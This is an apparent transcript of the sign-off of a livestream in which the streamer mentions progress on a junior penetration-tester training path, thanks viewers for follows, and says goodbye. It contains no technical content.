Yeah, so we've done 60% of that room, and then finish off the Windows box, and then that's all the progress for the junior pen tester. So yeah, not much longer.
GM
yeah.
Mike.
Yeah, good night. Thank you again for the one follow we had. Oh no, we had 2 follows. Thanks again, HB Salmansk. And yeah, I'll see you in Tiberius' stream. We can give him some abuse and make him use that. Alright, I'll catch you all later. Thanks again. Bye.
Sarmansk says,
Okay.